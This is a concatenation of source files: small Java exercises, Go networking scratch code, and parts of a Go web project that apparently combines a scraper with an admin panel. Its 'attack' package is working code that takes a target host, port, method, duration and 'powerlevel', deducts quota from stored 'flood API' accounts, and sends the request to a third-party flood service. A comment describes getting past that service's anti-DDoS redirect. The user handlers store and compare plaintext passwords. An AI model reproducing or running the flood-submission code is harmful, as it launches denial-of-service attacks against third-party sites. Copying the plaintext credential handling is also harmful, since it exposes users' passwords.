(int) (ceneterX - 120 * Math.cos(i * Math.PI / 30)), (int) (ceneterY + 120 * Math.sin(i * Math.PI / 30)));
}
}
}
public static void main(String[] args) {
new FirstClock();
}
}
<file_sep>import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
public class CC1234 {
public static void main(String[] args) {
BufferedReader a = new BufferedReader(new InputStreamReader(System.in));
try {
String c = a.readLine();
} catch (Exception e) {
System.out.println("BB");
}
}
<file_sep>import java.util.Scanner;
public class TEST_2 {
public static void main(String[] args) {
do{
square();
}while(true);
}
static void square(){
System.out.print("請輸入變數值:"); // prompt for the input value
Scanner scan = new Scanner(System.in);
int i = scan.nextInt();// read an int from the input stream
if(i<31) { // check whether i is less than 31
System.out.println("i的平方為:" + Math.pow(i, 2)); // print the square of i
}
else if(i>=31){
System.out.print("錯誤~~~ ");
}
}
}<file_sep>
public class AAA12 {
public static void main(String[] args) {
Brad421 b1 = new Brad422();
Brad422 b2 = (Brad422)b1;
Brad421 b3 = new Brad423();
Brad422 b4 = (Brad422)b3; // throws ClassCastException at runtime: a Brad423 is not a Brad422
}
}
class Brad421 {
void m1(){System.out.println("Brad421:m1()");}
}
class Brad422 extends Brad421 {
void m1(){System.out.println("Brad422:m1()");}
void m2(){System.out.println("Brad422:m2()");}
}
class Brad423 extends Brad421 {
void m1(){System.out.println("Brad423:m1()");}
void m2(){System.out.println("Brad423:m2()");}
}
|
5f42b31779520640bb3796de1b4e50f4edc69b3c
|
[
"Java"
] | 6 |
Java
|
Tim718820/test
|
1eaca6b3986b64aebf57c041e7165f0aac35008e
|
f99e08b2217cd0fec576e7f9831440728d3db36a
|
refs/heads/master
|
<file_sep>package main
import (
"fmt"
"github.com/PuerkitoBio/goquery"
"strings"
// "regexp"
"bytes"
"encoding/binary"
"net"
"github.com/huzorro/ospider/util"
)
func netName() {
addr, _ := net.InterfaceAddrs()
fmt.Println(addr) //[127.0.0.1/8 10.236.15.24/24 ::1/128 fe80::3617:ebff:febe:f123/64] local IPv4 and IPv6 addresses; the same information is shown by ifconfig
interfaces, _ := net.Interfaces()
fmt.Println(interfaces) //[{1 65536 lo up|loopback} {2 1500 eth0 34:17:eb:be:f1:23 up|broadcast|multicast}] index, MTU (maximum transmission unit), interface name, hardware address, and flags
hp := net.JoinHostPort("127.0.0.1", "8080")
fmt.Println(hp) //127.0.0.1:8080, joins an IP and a port into a single address string
lt, _ := net.LookupAddr("127.0.0.1")
fmt.Println(lt) //[localhost], reverse lookup: the names mapped to the given address
cname, _ := net.LookupCNAME("www.wxbsj.com")
fmt.Println(cname) //www.a.shifen.com, looks up the canonical DNS host name
host, _ := net.LookupHost("www.wxbsj.com")
fmt.Println(host) //[172.16.58.3 192.168.3.11], looks up the host addresses of the given domain
ip, _ := net.LookupIP("www.hndydb.com")
fmt.Println(ip) //[172.16.58.3 111.13.100.91], looks up the IP addresses of the given domain (same as nslookup)
fmt.Println(ip[0].String())
ipp, err := util.LookupHost("www.juanl.net")
if err != nil {
fmt.Println(err)
}
fmt.Printf("ip:%s ``", ipp)
}
func pack2unpack() {
var buf = make([]byte, 8)
binary.BigEndian.PutUint32(buf[:4], uint32(9000))
binary.BigEndian.PutUint32(buf[4:], uint32(9000))
fmt.Println(binary.BigEndian.Uint32(buf[:4]))
fmt.Println(binary.BigEndian.Uint32(buf[4:]))
fmt.Println(binary.BigEndian.Uint64(buf))
binary.BigEndian.PutUint32(buf[:4], uint32(2500))
binary.BigEndian.PutUint32(buf[4:], uint32(1))
fmt.Println(binary.BigEndian.Uint32(buf[:4]))
fmt.Println(binary.BigEndian.Uint32(buf[4:]))
fmt.Println(binary.BigEndian.Uint64(buf))
//19327352841000
var unbuf = make([]byte, 8)
binary.BigEndian.PutUint64(unbuf, uint64(38654705664000))
fmt.Println(binary.BigEndian.Uint32(unbuf[:4]))
fmt.Println(binary.BigEndian.Uint32(unbuf[4:]))
}
func main() {
var htmls = make([]string, 0)
doc, _ := goquery.NewDocument("http://www.oschina.net/news/71633/mongodb-3-3-3")
// doc.
// Find(`#NewsChannel > div.NewsBody > div > div.NewsEntity > div.Body.NewsContent.TextContent>p,
// #NewsChannel > div.NewsBody > div > div.NewsEntity > div.Body.New
// Each(func(i int, q *goquery.Selection){
// fmt.Println(q.Html())
// s, _ := q.Html()
// htmls = append(htmls, s)
// })
// fmt.Println( strings.Join(htmls, ""))
// goquery.NewDocumentFromReader(bytes.NewReader
doc.Find("#OSChina_News_71633").Each(func(i int, q *goquery.Selection) {
html, _ := q.Html()
htmls = append(htmls, html)
})
sub, _ := goquery.NewDocumentFromReader(bytes.NewReader([]byte(strings.Join(htmls, ""))))
sub.Find("img").Each(func(i int, q *goquery.Selection) {
fmt.Println(q.Attr("src"))
})
netName()
pack2unpack()
fmt.Println(0 & 1)
fmt.Println(1 & 1)
fmt.Println(2 & 1)
fmt.Println(3 & 1)
}
<file_sep>package attack
import (
"github.com/huzorro/ospider/common"
"github.com/huzorro/ospider/web/handler"
"github.com/huzorro/ospider/util"
"encoding/json"
"sync"
"net/url"
"fmt"
"github.com/PuerkitoBio/goquery"
"encoding/binary"
)
type AttackSubmit struct {
lock *sync.Mutex
cfg common.Ospider
}
func NewAttackSubmit(co common.Ospider) *AttackSubmit {
return &AttackSubmit{cfg:co, lock:new(sync.Mutex)}
}
func (self *AttackSubmit) Process(payload string) {
var (
attack handler.FloodTarget
api handler.FloodApi
powerlevel uint32
newPowerlevel uint32
time uint32
newTime uint32
)
self.cfg.Log.Println("attack submit...")
if err := json.Unmarshal([]byte(payload), &attack); err != nil {
self.cfg.Log.Printf("json Unmarshal fails %s", err)
return
}
self.lock.Lock()
defer self.lock.Unlock()
// sqlStr := `select id, name, api, powerlevel, time
// from spider_flood_api where uptime < unix_timestamp()
// and time > 0 and powerlevel > 0 and status = 1`
sqlStr := `select id, name, api, powerlevel, time
from spider_flood_api where uptime < unix_timestamp()
and status = 1`
stmtOut, err := self.cfg.Db.Prepare(sqlStr)
defer stmtOut.Close()
if err != nil {
self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
// self.lock.Unlock()
return
}
rows, err := stmtOut.Query()
defer rows.Close()
if err != nil {
self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
// self.lock.Unlock()
return
}
for rows.Next() {
err = rows.Scan(&api.Id, &api.Name, &api.Api, &api.Powerlevel, &api.Time)
if err != nil {
self.cfg.Log.Printf("rows.Scan (%s) fails %s", sqlStr, err)
// self.lock.Unlock()
return
}
var powerlevelBuf = make([]byte, 8)
binary.BigEndian.PutUint64(powerlevelBuf, uint64(api.Powerlevel))
powerlevel = binary.BigEndian.Uint32(powerlevelBuf[:4])
newPowerlevel = binary.BigEndian.Uint32(powerlevelBuf[4:])
var timeBuf = make([]byte, 8)
binary.BigEndian.PutUint64(timeBuf, uint64(api.Time))
time = binary.BigEndian.Uint32(timeBuf[:4])
newTime = binary.BigEndian.Uint32(timeBuf[4:])
if newPowerlevel > 0 && newTime > 0 {
break;
}
}
self.cfg.Log.Printf("powerlevel:%d-%d time:%d-%d", powerlevel, newPowerlevel, time, newTime)
if newPowerlevel <= 0 || newTime <= 0 {
// self.lock.Unlock()
self.cfg.Log.Printf("powerlevel or time run out")
return
}
sqlStr = `update spider_flood_api set time = ?, powerlevel = ? , uptime = unix_timestamp() + ? where id = ?`
stmtIn, err := self.cfg.Db.Prepare(sqlStr)
defer stmtIn.Close()
if err != nil {
self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
// self.lock.Unlock()
return
}
var powerlevelBuf = make([]byte, 8)
binary.BigEndian.PutUint32(powerlevelBuf[:4], powerlevel)
binary.BigEndian.PutUint32(powerlevelBuf[4:], newPowerlevel - uint32(attack.Powerlevel))
var timeBuf = make([]byte, 8)
binary.BigEndian.PutUint32(timeBuf[:4], time)
binary.BigEndian.PutUint32(timeBuf[4:], newTime - uint32(attack.Time))
self.cfg.Log.Printf("powerlevel:%d-%d-%d time:%d-%d-%d", powerlevel, newPowerlevel, attack.Powerlevel, time, newTime,attack.Time)
_, err = stmtIn.Exec(binary.BigEndian.Uint64(timeBuf), binary.BigEndian.Uint64(powerlevelBuf), attack.Time, api.Id)
if err != nil {
self.cfg.Log.Printf("update flood api fails %s", err)
// self.lock.Unlock()
return
}
// self.lock.Unlock()
//attack submit
u, _ := url.ParseRequestURI(api.Api)
query := u.Query()
// ips, err := net.LookupIP(attack.Url)
// if err == nil {
// attack.Host = ips[0].String()
// }
// self.cfg.Log.Println("lookup host start...")
// ip, err := util.LookupHost(attack.Url)
// self.cfg.Log.Println("lookup host end...")
// if err != nil {
// self.cfg.Log.Println("lookup host fails")
// } else {
// attack.Host = ip
// }
query.Add("host", attack.Host)
query.Add("method", attack.Method)
query.Add("time", fmt.Sprintf("%d", attack.Time))
query.Add("port", attack.Port)
query.Add("powerlevel", fmt.Sprintf("%d", attack.Powerlevel))
u.RawQuery = query.Encode()
self.cfg.Log.Println(u.String())
self.cfg.Log.Println("attack request start...")
response, err := util.HttpGet(u.String())
//the target api guards against ddos with a 302 redirect followed by an auto-refresh to the real api,
//so a headless browser is used to render the target api
// postValues := url.Values{}
// postValues.Add("url", u.String())
// postValues.Add("renderTime", "30")
// postValues.Add("script", "setTimeout(function() { console.log(document);},10000)")
// response, err := util.HttpPost("http://localhost:10010/doload", postValues)
self.cfg.Log.Println("attack request end...")
defer func() {
if response != nil {
response.Body.Close()
}
}()
if err != nil || response == nil {
self.cfg.Log.Printf("request fails {%s}", u.String())
return
}
self.cfg.Log.Println("attack response read start...")
doc, _ := goquery.NewDocumentFromResponse(response)
self.cfg.Log.Printf("{%s} {%s}", u.String(), doc.Text())
self.cfg.Log.Println("attack response read end...")
// sqlStr = `update spider_flood_api set time = ?, powerlevel = ? , uptime = unix_timestamp() + ? where id = ?`
// stmtIn, err := self.cfg.Db.Prepare(sqlStr)
// defer stmtIn.Close()
// if err != nil {
// self.cfg.Log.Printf("db.Prepare(%s) fails %s", sqlStr, err)
// return
// }
// var powerlevelBuf = make([]byte, 8)
// binary.BigEndian.PutUint32(powerlevelBuf[:4], powerlevel)
// binary.BigEndian.PutUint32(powerlevelBuf[4:], newPowerlevel - uint32(attack.Powerlevel))
// var timeBuf = make([]byte, 8)
// binary.BigEndian.PutUint32(timeBuf[:4], time)
// binary.BigEndian.PutUint32(timeBuf[4:], newTime - uint32(attack.Time))
// self.cfg.Log.Printf("powerlevel:%d-%d-%d time:%d-%d-%d", powerlevel, newPowerlevel, attack.Powerlevel, time, newTime,attack.Time)
// _, err = stmtIn.Exec(binary.BigEndian.Uint64(timeBuf), binary.BigEndian.Uint64(powerlevelBuf), attack.Time, api.Id)
// if err != nil {
// self.cfg.Log.Printf("update flood api fails %s", err)
// return
// }
}
<file_sep>
$(function() {
$(window).load(function(){
$.ajax({
url:"/api/spiders",
type:"post",
cache:false,
dataType:"json",
success:spiders
});
});
// $("select[name=Spiderid]").load(function() {
// alert("document loaded!");
// console.log("select load....");
// // $.ajax({
// // url:"/api/spiders",
// // type:"post",
// // cache:false,
// // dataType:"json",
// // success:spiders
// // });
// });
$("#add").click(function() {
console.log("Spiderid" + $("select[name=SpiderId]").val());
$.ajax({
url : "/rule/add",
data : {Name:$("input[name=Name]").val(), SpiderId:$("select[name=SpiderId]").val(),
Url:$("input[name=Url]").val(), Section:$("input[name=Section]").val(),
Href:$("input[name=Href]").val(), Title:$("input[name=Title]").val(),
Content:$("input[name=Content]").val(), Filter:$("input[name=Filter]").val()
},
type : "post",
cache : false,
dataType : "json",
success: commonInfo
});
});
// $("#my-tab-content").delegate("button[name=operate]", "click", function() {
// console.log($(this).val());
// $.ajax({
// url : "/key/one",
// data : {Id:$(this).val()},
// type : "post",
// cache : false,
// dataType : "json",
// success: keyone
// });
// });
$("button[name=operate]").click(function() {
console.log($(this).val() + "Abc");
$.ajax({
url : "/rule/one",
data : {Id:$(this).val()},
type : "post",
cache : false,
dataType : "json",
success: one
});
});
$("#edit").click(function() {
$.ajax({
url : "/rule/edit",
data : {Id:$("#Id").val(), Name:$("#Name").val(),
SpiderId:$("#SpiderId").val(), Url:$("#Url").val(),
Section:$("#Section").val(), Href:$("#Href").val(),
Title:$("#Title").val(), Content:$("#Content").val(),
Filter:$("#Filter").val(),
Status:$("input[name=Status]:checked").val()},
type : "post",
cache : false,
dataType : "json",
success: commonInfo
});
});
$("#infoModal .btn").click(function(){
location.reload();
});
$("#close").click(function(){
location.reload();
});
});
function commonInfo(json) {
if (json.status !== undefined) {
$('#infoModal').modal('toggle');
$('#infoModal p').text(json.text);
// location.reload();
return
}
}
function one(json) {
console.log(json);
$('#editRuleModal').modal('toggle');
if (json.status !== undefined && json.text !== undefined) {
$("#Status").html(json.text);
} else {
var htmls = [];
$("#Id").val(json.id);
$("#Name").val(json.name);
// $("#Spiderid").val(json.spiderid);
$("#Url").val(json.url);
$("#Section").val(json.selector.section);
$("#Href").val(json.selector.href);
$("#Title").val(json.selector.title);
$("#Content").val(json.selector.content);
$("#Filter").val(json.selector.filter);
if (json.status) {
htmls.push('<input type="radio" name="Status" value=0 >停用<input type="radio" name="Status" value=1 checked>启用');
} else {
htmls.push('<input type="radio" name="Status" value=0 checked>停用<input type="radio" name="Status" value=1 >启用');
}
$("#Status").html(htmls.join(""));
//select
$("#SpiderId>option").each(function(){
if($(this).val() == json.spiderid) {
$(this).attr("selected","selected");
}
});
}
}
function spiders(json) {
console.log(json);
if (json.status !== undefined && json.text !== undefined) {
$("#Status").html(json.text);
} else {
var htmls = [];
$.each(json, function(key, value) {
console.log(key+value.id);
htmls.push("<option value=" + value.id + ">" + value.name + "</option>")
});
$("select[name=SpiderId]").html(htmls.join(""));
$("#SpiderId").html(htmls.join(""))
}
} <file_sep>package user
import (
"database/sql"
"encoding/json"
"github.com/huzorro/spfactor/sexredis"
"github.com/martini-contrib/render"
"github.com/martini-contrib/sessions"
"log"
"net/http"
"net/url"
"strconv"
"strings"
"github.com/huzorro/ospider/util"
"github.com/huzorro/ospider/common"
)
type Status struct {
Status string `json:"status"`
Text string `json:"text"`
}
// type Cfg struct {
// //database type
// Dbtype string `json:"dbtype"`
// //database connection URI
// Dburi string `json:"dburi"`
// //page size
// PageSize int64 `json:"pageSize"`
// }
type UserRelation struct {
User SpStatUser
Role SpStatRole
Access SpStatAccess
}
func Logout(r *http.Request, w http.ResponseWriter, log *log.Logger, session sessions.Session) {
session.Clear()
http.Redirect(w, r, LOGIN_PAGE_NAME, 301)
}
func LoginCheck(r *http.Request, w http.ResponseWriter, log *log.Logger, db *sql.DB, session sessions.Session) (int, string) {
//cross domain
w.Header().Set("Access-Control-Allow-Origin", "*")
un := r.PostFormValue("username")
pd := r.PostFormValue("password")
var (
s Status
)
stmtOut, err := db.Prepare(`SELECT a.id, a.username, a.password, a.roleid, b.name, b.privilege, b.menu,
a.accessid, c.pri_group, c.pri_rule FROM sp_user a
INNER JOIN sp_role b ON a.roleid = b.id
INNER JOIN sp_access_privilege c ON a.accessid = c.id
WHERE username = ? AND password = ? `)
if err != nil {
log.Printf("get login user fails %s", err)
s = Status{"500", "内部错误导致登录失败."}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
result, err := stmtOut.Query(un, pd)
defer func() {
stmtOut.Close()
result.Close()
}()
if err != nil {
log.Printf("%s", err)
// http.Redirect(w, r, ERROR_PAGE_NAME, 301)
s = Status{"500", "内部错误导致登录失败."}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
if result.Next() {
u := SpStatUser{}
u.Role = &SpStatRole{}
u.Access = &SpStatAccess{}
var g string
if err := result.Scan(&u.Id, &u.UserName, &u.Password, &u.Role.Id, &u.Role.Name, &u.Role.Privilege, &u.Role.Menu, &u.Access.Id, &g, &u.Access.Rule); err != nil {
log.Printf("%s", err)
s = Status{"500", "内部错误导致登录失败."}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
} else {
u.Access.Group = strings.Split(g, ";")
//
uSession, _ := json.Marshal(u)
session.Set(SESSION_KEY_QUSER, uSession)
s = Status{"200", "登录成功"}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
} else {
log.Printf("%s", err)
s = Status{"403", "登录失败,用户名/密码错误"}
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
}
func ViewUsersAction(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
redisPool *sexredis.RedisPool, cfg *common.Cfg, session sessions.Session, ms []*SpStatMenu, render render.Render) {
var (
userRelation *UserRelation
userRelations []*UserRelation
menu []*SpStatMenu
user SpStatUser
con string
totalN int64
destPn int64
)
path := r.URL.Path
r.ParseForm()
value := session.Get(SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &user)
} else {
		log.Printf("session store type error")
http.Redirect(w, r, ERROR_PAGE_NAME, 301)
return
}
switch user.Access.Rule {
case GROUP_PRI_ALL:
case GROUP_PRI_ALLOW:
con = "WHERE a.id IN(" + strings.Join(user.Access.Group, ",") + ")"
case GROUP_PRI_BAN:
con = "WHERE a.id NOT IN(" + strings.Join(user.Access.Group, ",") + ")"
default:
		log.Printf("group privilege rule error")
}
for _, elem := range ms {
if (user.Role.Menu & elem.Id) == elem.Id {
menu = append(menu, elem)
}
}
stmtOut, err := db.Prepare("SELECT COUNT(*) FROM sp_user a " + con)
if err != nil {
log.Printf("%s", err)
http.Redirect(w, r, ERROR_PAGE_NAME, 301)
return
}
row := stmtOut.QueryRow()
if err = row.Scan(&totalN); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, ERROR_PAGE_NAME, 301)
return
}
//page
if r.URL.Query().Get("p") != "" {
destPn, _ = strconv.ParseInt(r.URL.Query().Get("p"), 10, 64)
} else {
destPn = 1
}
	stmtOut.Close()
	stmtOut, err = db.Prepare(`SELECT a.id, a.username, a.password, a.roleid, a.accessid,
    b.name, c.pri_rule FROM sp_user a LEFT JOIN sp_role b ON a.roleid = b.id
    LEFT JOIN sp_access_privilege c ON a.accessid = c.id ` + con + " GROUP BY a.id ORDER BY a.id DESC LIMIT ?, ?")
	if err != nil {
		log.Printf("%s", err)
		http.Redirect(w, r, ERROR_PAGE_NAME, 301)
		return
	}
	defer stmtOut.Close()
	rows, err := stmtOut.Query(cfg.PageSize*(destPn-1), cfg.PageSize)
	if err != nil {
		log.Printf("%s", err)
		http.Redirect(w, r, ERROR_PAGE_NAME, 301)
		return
	}
	defer rows.Close()
for rows.Next() {
userRelation = &UserRelation{}
if err := rows.Scan(&userRelation.User.Id, &userRelation.User.UserName, &userRelation.User.Password,
&userRelation.Role.Id, &userRelation.Access.Id, &userRelation.Role.Name,
&userRelation.Access.Rule); err != nil {
log.Printf("%s", err)
http.Redirect(w, r, ERROR_PAGE_NAME, 301)
return
}
userRelations = append(userRelations, userRelation)
}
paginator := util.NewPaginator(r, cfg.PageSize, totalN)
ret := struct {
Menu []*SpStatMenu
Result []*UserRelation
Paginator *util.Paginator
User *SpStatUser
}{menu, userRelations, paginator, &user}
index := strings.LastIndex(path, "/")
render.HTML(200, path[index+1:], ret)
}
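ViewUsersAction filters the menu with `(user.Role.Menu & elem.Id) == elem.Id`: a role's `Menu` field is the OR of the menu-item ids it may see, and an item is visible only when all of its bits are present in the role mask. A minimal, self-contained sketch of that bitmask visibility test (the ids below are illustrative, not real `sp_role` data):

```go
package main

import "fmt"

// visibleMenus keeps only the menu ids whose bits are all set in roleMask,
// the same test the handlers use: (roleMask & id) == id.
func visibleMenus(roleMask int64, menuIds []int64) []int64 {
	var visible []int64
	for _, id := range menuIds {
		if roleMask&id == id {
			visible = append(visible, id)
		}
	}
	return visible
}

func main() {
	// a role allowed to see menu items 1 and 4 (mask 5 = 0b101)
	fmt.Println(visibleMenus(5, []int64{1, 2, 4, 8}))
}
```

This only works when each menu id is a distinct power of two, which is what the `|`-composed masks in the handlers assume.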
func ViewUserAction(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
redisPool *sexredis.RedisPool, cfg *common.Cfg, session sessions.Session, ms []*SpStatMenu, render render.Render) (int, string) {
var (
user SpStatUser
)
r.ParseForm()
id, err := url.QueryUnescape(strings.TrimSpace(r.PostFormValue("id")))
user.Id, _ = strconv.ParseInt(id, 10, 64)
	stmtOut, err := db.Prepare("SELECT username, password FROM sp_user WHERE id = ?")
	if err != nil {
		log.Printf("%s", err)
		js, _ := json.Marshal(Status{"201", "操作失败"})
		return http.StatusOK, string(js)
	}
	defer stmtOut.Close()
	row := stmtOut.QueryRow(user.Id)
	err = row.Scan(&user.UserName, &user.Password)
if err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
if js, err := json.Marshal(user); err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
} else {
return http.StatusOK, string(js)
}
}
func EditUserAction(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
redisPool *sexredis.RedisPool, cfg *common.Cfg, session sessions.Session, ms []*SpStatMenu, render render.Render) (int, string) {
var (
user SpStatUser
)
r.ParseForm()
id, err := url.QueryUnescape(strings.TrimSpace(r.PostFormValue("id")))
user.Id, _ = strconv.ParseInt(id, 10, 64)
user.UserName, err = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("userName")))
user.Password, err = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("password")))
if user.UserName == "" || user.Password == "" {
		log.Printf("userName or password is empty")
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
if err != nil {
log.Printf("post param parse fails %s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
	stmtIn, err := db.Prepare("UPDATE sp_user SET username=?, password=? WHERE id = ?")
	if err != nil {
		log.Printf("%s", err)
		js, _ := json.Marshal(Status{"201", "操作失败"})
		return http.StatusOK, string(js)
	}
	defer stmtIn.Close()
if _, err = stmtIn.Exec(user.UserName, user.Password, user.Id); err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
js, _ := json.Marshal(Status{"200", "操作成功"})
return http.StatusOK, string(js)
}
func AddUserAction(r *http.Request, w http.ResponseWriter, db *sql.DB, log *log.Logger,
redisPool *sexredis.RedisPool, cfg *common.Cfg, session sessions.Session, ms []*SpStatMenu, render render.Render) (int, string) {
r.ParseForm()
userName, err := url.QueryUnescape(strings.TrimSpace(r.PostFormValue("userName")))
password, err := url.QueryUnescape(strings.TrimSpace(r.PostFormValue("password")))
if userName == "" || password == "" {
		log.Printf("userName or password is empty")
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
tx, err := db.Begin()
if err != nil {
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
	stmtIn, err := tx.Prepare("INSERT INTO sp_user (username, password) VALUES(?, ?)")
	if err != nil {
		tx.Rollback()
		log.Printf("%s", err)
		js, _ := json.Marshal(Status{"201", "操作失败"})
		return http.StatusOK, string(js)
	}
	defer stmtIn.Close()
	result, err := stmtIn.Exec(userName, password)
	if err != nil {
		tx.Rollback()
		log.Printf("%s", err)
		js, _ := json.Marshal(Status{"201", "操作失败"})
		return http.StatusOK, string(js)
	}
	id, err := result.LastInsertId()
	if err != nil {
		tx.Rollback()
		log.Printf("%s", err)
		js, _ := json.Marshal(Status{"201", "操作失败"})
		return http.StatusOK, string(js)
	}
	stmtInAccess, err := tx.Prepare("INSERT INTO sp_access_privilege(pri_group, pri_rule) VALUES(?, ?)")
	if err != nil {
		tx.Rollback()
		log.Printf("%s", err)
		js, _ := json.Marshal(Status{"201", "操作失败"})
		return http.StatusOK, string(js)
	}
	defer stmtInAccess.Close()
result, err = stmtInAccess.Exec(id, GROUP_PRI_ALLOW)
if err != nil {
tx.Rollback()
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
accessId, err := result.LastInsertId()
if err != nil {
tx.Rollback()
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
	stmtInUpdate, err := tx.Prepare("UPDATE sp_user SET accessid = ? WHERE id = ?")
	if err != nil {
		tx.Rollback()
		log.Printf("%s", err)
		js, _ := json.Marshal(Status{"201", "操作失败"})
		return http.StatusOK, string(js)
	}
	defer stmtInUpdate.Close()
_, err = stmtInUpdate.Exec(accessId, id)
if err != nil {
tx.Rollback()
log.Printf("%s", err)
js, _ := json.Marshal(Status{"201", "操作失败"})
return http.StatusOK, string(js)
}
	if err := tx.Commit(); err != nil {
		log.Printf("%s", err)
		js, _ := json.Marshal(Status{"201", "操作失败"})
		return http.StatusOK, string(js)
	}
js, _ := json.Marshal(Status{"200", "操作成功"})
return http.StatusOK, string(js)
}

package handler
import (
"database/sql"
_"github.com/go-sql-driver/mysql"
"github.com/go-martini/martini"
"github.com/huzorro/ospider/web/user"
"net/http"
"log"
"github.com/martini-contrib/sessions"
"encoding/json"
"strings"
"strconv"
"reflect"
"net/url"
"github.com/martini-contrib/render"
"github.com/huzorro/ospider/util"
"time"
"github.com/huzorro/ospider/common"
)
type QueueName struct {
Task string `json:"task"`
Result string `json:"result"`
}
type Manager struct {
Id int64 `json:"id"`
Uid int64 `json:"uid"`
Name string `json:"name"`
QueueName
QueueNameStr string `json:"queueName"`
Status int64 `json:"status"`
Logtime string `json:"logtime"`
}
type SpiderRelation struct {
Manager
user.SpStatUser
}
func GetSpidersApi(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
manager Manager
managers []Manager
js []byte
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
sqlStr := `select id, uid, name, queue_name_json, status, logtime from spider_manager where status = 1`
	stmtOut, err := db.Prepare(sqlStr)
	if err != nil {
		log.Printf("%s", err)
		rs, _ := json.Marshal(s)
		return http.StatusOK, string(rs)
	}
	defer stmtOut.Close()
	rows, err := stmtOut.Query()
	if err != nil {
		log.Printf("%s", err)
		rs, _ := json.Marshal(s)
		return http.StatusOK, string(rs)
	}
	defer rows.Close()
for rows.Next() {
if err := rows.Scan(&manager.Id, &manager.Uid, &manager.Name,
&manager.QueueNameStr, &manager.Status, &manager.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
if err := json.Unmarshal([]byte(manager.QueueNameStr), &manager.QueueName); err != nil {
log.Printf("json Unmarshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
managers = append(managers, manager)
}
if js, err = json.Marshal(managers); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func GetSpider(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
manager Manager
js []byte
spUser user.SpStatUser
con string
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
value := session.Get(user.SESSION_KEY_QUSER)
if v, ok := value.([]byte); ok {
json.Unmarshal(v, &spUser)
} else {
		log.Printf("session store type error")
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
switch spUser.Access.Rule {
case user.GROUP_PRI_ALL:
case user.GROUP_PRI_ALLOW:
con = " a.uid IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
case user.GROUP_PRI_BAN:
con = " a.uid NOT IN(" + strings.Join(spUser.Access.Group, ",") + ") and "
default:
		log.Printf("group privilege rule error")
}
sqlStr := `select id, uid, name, queue_name_json, status, logtime from spider_manager where ` +
con + " id = ?"
	stmtOut, err := db.Prepare(sqlStr)
	if err != nil {
		log.Printf("%s", err)
		rs, _ := json.Marshal(s)
		return http.StatusOK, string(rs)
	}
	defer stmtOut.Close()
	id, _ := strconv.Atoi(r.PostFormValue("Id"))
	rows, err := stmtOut.Query(id)
	if err != nil {
		log.Printf("%s", err)
		rs, _ := json.Marshal(s)
		return http.StatusOK, string(rs)
	}
	defer rows.Close()
if rows.Next() {
if err := rows.Scan(&manager.Id, &manager.Uid, &manager.Name,
&manager.QueueNameStr, &manager.Status, &manager.Logtime); err != nil {
log.Printf("%s", err)
rs, _:= json.Marshal(s)
return http.StatusOK, string(rs)
}
if err := json.Unmarshal([]byte(manager.QueueNameStr), &manager.QueueName); err != nil {
log.Printf("json Unmarshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
}
if js, err = json.Marshal(manager); err != nil {
log.Printf("json Marshal fails %s", err)
rs, _ := json.Marshal(s)
return http.StatusOK, string(rs)
}
return http.StatusOK, string(js)
}
func EditSpider(r *http.Request, w http.ResponseWriter, db *sql.DB,
log *log.Logger, session sessions.Session, p martini.Params) (int, string) {
var (
manager Manager
js []byte
spUser user.SpStatUser
)
s := user.Status{Status:"500", Text:"操作失败"}
r.ParseForm()
rType := reflect.TypeOf(&manager).Elem()
rValue := reflect.ValueOf(&manager).Elem()
for i := 0; i < rType.NumField(); i++ {
fN := rType.Field(i).Name
if p, _ := url.QueryUnescape(strings.TrimSpace(r.PostFormValue(fN))); p != "" {
switch rType.Field(i).Type.Kind() {
case reflect.String:
rValue.FieldByName(fN).SetString(p)
case reflect.Int64:
in, _ := strconv.ParseInt(p, 10, 64)
rValue.FieldByName(fN).SetInt(in)
case reflect.Float64:
fl, _ := strconv.ParseFloat(p, 64)
rValue.FieldByName(fN).SetFloat(fl)
default:
				log.Printf("unknown type %s", p)
}
}
}
manager.Task, _ = url.QueryUnescape(strings.TrimSpace(r.PostFormValue("Task")))
